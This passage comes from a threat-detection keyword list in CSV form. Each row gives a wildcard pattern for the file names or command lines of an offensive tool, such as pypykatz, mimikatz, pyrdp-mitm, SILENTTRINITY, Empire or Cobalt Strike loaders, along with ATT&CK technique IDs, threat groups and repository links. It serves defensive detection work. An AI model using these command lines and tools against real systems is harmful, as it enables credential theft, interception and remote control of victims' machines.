Exfiltration,https://github.com/realgam3/pymultitor,1,0,N/A,N/A,6,543,116,2022-08-28T22:06:01Z,2013-09-28T15:55:49Z -*pypykatz *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pypykatz lsa minidump *,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*pypykatz lsa minidump*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/skelsec/pypykatz,1,0,N/A,10,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pypykatz.commons*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pypykatz.dpapi*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pypykatz.exe*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pypykatz.git*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pypykatz.kerberos*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pypykatz.lsadecryptor*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pypykatz.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pypykatz.registry*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pypykatz_handler.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*pypykatz_rekall.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pypykatzClass*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*pypykatzfile*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*pypykatz-master.zip*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pyrdp_output -*,offensive_tool_keyword,pyrdp,RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact,T1550.002 - T1059.006 - T1071.001,TA0002 - TA0010,N/A,N/A,Sniffing & Spoofing,https://github.com/GoSecure/pyrdp,1,1,can also be used by blueteam as a honeypot,10,10,1296,235,2023-07-28T14:33:09Z,2018-09-07T19:17:41Z -*pyrdp-clonecert.py*,offensive_tool_keyword,pyrdp,RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact,T1550.002 - T1059.006 - T1071.001,TA0002 - TA0010,N/A,N/A,Sniffing & Spoofing,https://github.com/GoSecure/pyrdp,1,1,can also be used by blueteam as a honeypot,10,10,1296,235,2023-07-28T14:33:09Z,2018-09-07T19:17:41Z -*pyrdp-convert.py*,offensive_tool_keyword,pyrdp,RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact,T1550.002 - T1059.006 - T1071.001,TA0002 - TA0010,N/A,N/A,Sniffing & Spoofing,https://github.com/GoSecure/pyrdp,1,1,can also be used by blueteam as a honeypot,10,10,1296,235,2023-07-28T14:33:09Z,2018-09-07T19:17:41Z -*pyrdp-mitm.py*,offensive_tool_keyword,pyrdp,RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact,T1550.002 - T1059.006 - T1071.001,TA0002 - TA0010,N/A,N/A,Sniffing & Spoofing,https://github.com/GoSecure/pyrdp,1,1,can also be used by blueteam as a honeypot,10,10,1296,235,2023-07-28T14:33:09Z,2018-09-07T19:17:41Z -*pyrdp-player.py*,offensive_tool_keyword,pyrdp,RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact,T1550.002 - T1059.006 - T1071.001,TA0002 - TA0010,N/A,N/A,Sniffing & Spoofing,https://github.com/GoSecure/pyrdp,1,1,can also be used by blueteam as a honeypot,10,10,1296,235,2023-07-28T14:33:09Z,2018-09-07T19:17:41Z -*pyrit -e * create_essid*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pyrit -i *.txt import_passwords*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pyrit -r *.pcap attack_db*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pyrit -r *.pcap -b * -i *.txt attack_passthrough*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pysoserial.py*,offensive_tool_keyword,pysoserial,Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,shell spawning,https://github.com/aStrowxyu/Pysoserial,1,1,N/A,9,1,9,1,2021-12-06T07:41:55Z,2021-11-16T01:55:31Z -*Pysoserial-main*,offensive_tool_keyword,pysoserial,Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,shell spawning,https://github.com/aStrowxyu/Pysoserial,1,1,N/A,9,1,9,1,2021-12-06T07:41:55Z,2021-11-16T01:55:31Z -*PySplunkWhisperer2*,offensive_tool_keyword,SplunkWhisperer2,Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations,T1068 - T1059.003 - T1071.001,TA0003 - TA0002 - TA0011,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cnotin/SplunkWhisperer2,1,1,N/A,9,3,239,53,2022-09-30T16:41:17Z,2019-02-24T18:05:51Z -*pystinger_for_darkshadow*,offensive_tool_keyword,cobaltstrike,Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FunnyWolf/pystinger,1,1,N/A,10,10,1283,212,2021-09-29T13:13:43Z,2019-09-29T05:23:54Z -*python 3 st teamserver *,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*python -m http.server*,greyware_tool_keyword,http.server,setup a simple http server,T1021.005 - T1049,TA0009 - TA0002,N/A,N/A,Data Exfiltration,N/A,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*python -m orbitaldump *,offensive_tool_keyword,orbitaldump,A simple multi-threaded distributed SSH brute-forcing tool written in Python.,T1110,TA0006,N/A,N/A,Exploitation tools,https://github.com/k4yt3x/orbitaldump,1,0,N/A,N/A,5,440,86,2022-10-30T23:40:57Z,2021-06-06T17:48:19Z -*python -m rarce *,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,0,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -*python -m SimpleHTTPServer*,greyware_tool_keyword,simplehttpserver,quick web server in python,T1021.002 - T1059.006,TA0002 - TA0005,N/A,N/A,Data Exfiltration,https://docs.python.org/2/library/simplehttpserver.html,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*python noPac.*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*python rsf.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*python scshell*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,0,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*python st.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*python tinar.py*,offensive_tool_keyword,ThisIsNotRat,control windows computeur from telegram,T1098 - T1079 - T1105 - T1047 - T1059,TA0010 - TA0009 - TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RealBey/ThisIsNotRat,1,0,N/A,9,10,49,18,2023-09-10T07:39:38Z,2023-09-07T14:07:32Z -*python* pachine.py*,offensive_tool_keyword,Pachine,Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation),T1068 - T1078 - T1059.006,TA0003 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/ly4k/Pachine,1,0,N/A,8,3,262,37,2022-01-13T12:35:19Z,2021-12-13T23:15:05Z -*python*charlotte.py*,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,0,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z -*python*http://*:6970/ConfigFileCacheList.txt*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,0,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*python*'http://*SEP*:6970/*.cnf.xml*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,0,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*python*https://*:8443/cucm-uds/users?name=*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,0,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*python_modules/keyboard.zip*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1100,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*python2??/generator.py*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*python2??/PyLoader.py*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*python3 ./exp.py --url http://*,offensive_tool_keyword,SpringCore0day,SpringCore0day from share.vx-underground.org & some additional links,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/craig/SpringCore0day,1,0,N/A,N/A,4,394,187,2022-03-31T11:54:22Z,2022-03-30T15:50:28Z -*python3 fee.py*,offensive_tool_keyword,fileless-elf-exec,Execute ELF files without dropping them on disk,T1059.003 - T1055.012 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/nnsee/fileless-elf-exec,1,1,N/A,8,4,334,40,2021-11-16T15:46:23Z,2020-01-06T12:19:34Z -*python3 gcr.py*,offensive_tool_keyword,GCR-Google-Calendar-RAT,Google Calendar RAT is a PoC of Command&Control over Google Calendar Events,T1071.001 - T1021.002 - T1059,TA0002 - TA0005,N/A,N/A,C2,https://github.com/MrSaighnal/GCR-Google-Calendar-RAT,1,0,N/A,10,10,78,15,2023-06-26T09:04:02Z,2023-06-18T13:23:31Z -*python3 GetHash.py NtCreateFile*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,0,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*python3 -m orbitaldump *,offensive_tool_keyword,orbitaldump,A simple multi-threaded distributed SSH brute-forcing tool written in Python.,T1110,TA0006,N/A,N/A,Exploitation tools,https://github.com/k4yt3x/orbitaldump,1,0,N/A,N/A,5,440,86,2022-10-30T23:40:57Z,2021-06-06T17:48:19Z -*python3 -m S3Scanner*,offensive_tool_keyword,S3Scanner,Scan for open S3 buckets and dump the contents,T1583 - T1583.002 - T1114 - T1114.002,TA0010,N/A,N/A,Reconnaissance,https://github.com/sa7mon/S3Scanner,1,0,N/A,8,10,2221,366,2023-10-02T13:25:28Z,2017-06-19T22:14:21Z -*python3 Ninja.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,0,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*python3 pacu.py*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*python3 rsf.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*python3 scshell*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,0,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*python3 sitadel*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z -*python3 st client wss://*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*python3 st.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - 